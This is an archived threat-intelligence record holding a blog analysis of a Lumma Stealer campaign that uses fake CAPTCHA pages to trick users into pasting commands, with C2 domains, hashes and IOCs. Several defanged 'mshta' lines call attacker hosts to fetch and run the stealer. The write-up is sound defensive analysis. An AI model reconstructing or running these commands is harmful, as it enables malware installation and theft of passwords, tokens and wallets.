{
	"id": "49993431-32d0-4b02-8452-c081b6f0c27f",
	"created_at": "2026-04-06T01:30:07.49185Z",
	"updated_at": "2026-04-10T03:22:39.461096Z",
	"deleted_at": null,
	"sha1_hash": "804b0761389ffa959cd716b6d4b1c5742065efca",
	"title": "Anatomy of a Lumma Stealer Attack via Fake CAPTCHA Pages - Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 344597,
	"plain_text": "Anatomy of a Lumma Stealer Attack via Fake CAPTCHA Pages - Part 1\r\nBy Tonmoy Jitu\r\nPublished: 2024-08-30 · Archived: 2026-04-06 00:45:02 UTC\r\nAs of late August 2024, attackers have been using fraudulent \"human verification\" pages to trick users into executing a malicious PowerShell script. This blog post explores the full attack vector, detailing how the malware is delivered and executed, and the indicators of compromise (IOCs) involved.\r\nLumma Stealer is designed to exfiltrate sensitive information such as passwords, session tokens, cryptocurrency wallets, and other personal data from infected machines. What makes this attack more dangerous is the deceptive delivery method, which exploits users’ trust in CAPTCHA pages through social engineering.\r\nFake CAPTCHA Pages\r\nThe attack begins with unsuspecting users being directed to a fake CAPTCHA page under the guise of human verification. These CAPTCHA pages mimic legitimate websites but instruct users to copy and paste a PowerShell script into their system's Run window. Upon execution, the script retrieves and executes a malicious EXE file: Lumma Stealer.\r\nhttps://denwp.com/anatomy-of-a-lumma-stealer/\r\nExecution of Malicious PowerShell Script\r\nThe heart of this attack lies in the copy/paste PowerShell script. By convincing victims to run this script, attackers gain control over the victim's machine and use it to download and execute the Lumma Stealer malware.\r\nThe PowerShell script fetches a malicious PE32 executable, Lumma Stealer, which is then run on the victim’s machine.\r\nExample of the malicious command execution:\r\nmshta hxxps[:]//propller.b-cdn[.]net/propller\r\nMalware Analysis: Lumma Stealer\r\nFirst, we needed to identify how clicking the CAPTCHA button led to the encoded PowerShell code being copied to our clipboard. The answer lies within the page's source code. By inspecting the source, we found a JavaScript snippet. This code clearly shows that when the verification button is clicked, the encoded code is automatically copied to the clipboard.\r\nUsing CyberChef to decode the code, we discovered that it invokes a Windows native binary called mshta, passing a URL as a parameter.\r\nmshta.exe is a legitimate Windows utility used to execute HTML Applications (HTA) and handle embedded scripts, such as VBScript or JavaScript. Because it is a trusted binary signed by Microsoft, it often passes security filters, making it a prime candidate for abuse in \"living off the land\" attacks. This technique allows attackers to execute malicious scripts without raising alarms, as mshta.exe typically won't be flagged by antivirus or endpoint protection systems.\r\nBy passing a URL as a parameter, the attacker can host malicious scripts or executables remotely and have them fetched and run by mshta, creating a lightweight and flexible attack vector. This lets attackers download further payloads, such as malware, without needing to drop any initial files on the victim’s system, which helps evade detection.\r\nThrough dynamic analysis, we mapped the entire attack chain. When the encoded code is executed via the Run command, it triggers a PowerShell session. This PowerShell session then runs mshta, which executes another command to download the payload.\r\nChecking the directory where the payload was downloaded, we found the installer along with a zip file, which seemed unusual.\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\Temp\\\r\nUpon inspecting the contents of the zip file, we discovered that it contained a legitimate tool alongside malicious DLLs. These DLLs are used to install the Lumma Stealer malware.\r\nC2 Domain\r\nWe had Wireshark running in the background and were able to capture the C2 domains from the TCP transmissions.\r\ngreetycruthsuo[.]shop\r\nOnce Lumma Stealer is executed on the infected machine, it communicates with command and control (C2) servers to exfiltrate stolen data. The C2 servers identified in this campaign are:\r\ngreetycruthsuo[.]shop\r\ntibedowqmwo[.]shop\r\nfutureddospzmvq[.]shop\r\nThese servers are critical to the attacker’s ability to collect and manage the stolen information.\r\nIOCs\r\nFake human CAPTCHA pages as of 2024-08-28:\r\nInfection traffic from fake verification page:\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/human-captcha-v1[.]html\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtmed \u003c-- Lumma Stealer EXE retrieved and run by copied/pasted script\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt1[.]zip\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt2[.]zip\r\nhxxps[:]//iplogger[.]co/Zv0L8[.]zip \u003c-- parked domain, returned small, non-malicious PNG image\r\ntibedowqmwo[.]shop \u003c-- HTTPS Lumma Stealer C2 traffic\r\nInfection traffic from fake verification page:\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/human-verify-system[.]html\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtx \u003c-- Lumma Stealer EXE retrieved and run by copied/pasted script\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt1[.]zip\r\nhxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrt2[.]zip\r\nhxxps[:]//iplogger[.]co/Zbg73[.]zip \u003c-- parked domain, returned small, non-malicious PNG image\r\ntibedowqmwo[.]shop \u003c-- HTTPS Lumma Stealer C2 traffic\r\nInfection traffic from fake verification page:\r\nhxxps[:]//ch3[.]dlvideosfre[.]click/human-verify-system[.]html\r\nhxxps[:]//verif[.]dlvideosfre[.]click/2ndhsoru \u003c-- Lumma Stealer EXE retrieved and run by copied/pasted script\r\nhxxps[:]//verif[.]dlvideosfre[.]click/K1[.]zip\r\nhxxps[:]//verif[.]dlvideosfre[.]click/K2[.]zip\r\nfutureddospzmvq[.]shop \u003c-- HTTPS Lumma Stealer C2 traffic\r\nWindows EXE files for Lumma Stealer:\r\nSHA256 hash: 07b127b0c351547fa8ec4cac6cd5fd68dc8916dc4557ab13909ca95d53478a7d\r\nFile size: 184,056 bytes\r\nFile location: hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtmed\r\nFile type: PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile description: Windows EXE for Lumma Stealer\r\nRun method: mshta hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtmed\r\n=====================================================\r\nSHA256 hash: 539574e6af31c459925943267001e2a9d61fb2c592762b5c4dcbedd90155d8a3\r\nFile size: 180,702 bytes\r\nFile location: hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtx\r\nFile type: PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile description: Windows EXE for Lumma Stealer\r\nRun method: mshta hxxps[:]//myapt67[.]s3[.]amazonaws[.]com/pgrtx\r\n=====================================================\r\nSHA256 hash: 7d6ee310f1cd4512d140c94a95f0db4e76a7171c6a65f5c483e7f8a08f7efe78\r\nFile size: 201,092 bytes\r\nFile location: hxxps[:]//verif[.]dlvideosfre[.]click/2ndhsoru\r\nFile type: PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile description: Windows EXE for Lumma Stealer\r\nRun method: mshta hxxps[:]//verif[.]dlvideosfre[.]click/2ndhsoru\r\nReference:\r\nPaloAltoNetworks/Unit42-timely-threat-intel (GitHub): 2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt\r\nSource: https://denwp.com/anatomy-of-a-lumma-stealer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://denwp.com/anatomy-of-a-lumma-stealer/"
	],
	"report_names": [
		"anatomy-of-a-lumma-stealer"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439007,
	"ts_updated_at": 1775791359,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/804b0761389ffa959cd716b6d4b1c5742065efca.pdf",
		"text": "https://archive.orkl.eu/804b0761389ffa959cd716b6d4b1c5742065efca.txt",
		"img": "https://archive.orkl.eu/804b0761389ffa959cd716b6d4b1c5742065efca.jpg"
	}
}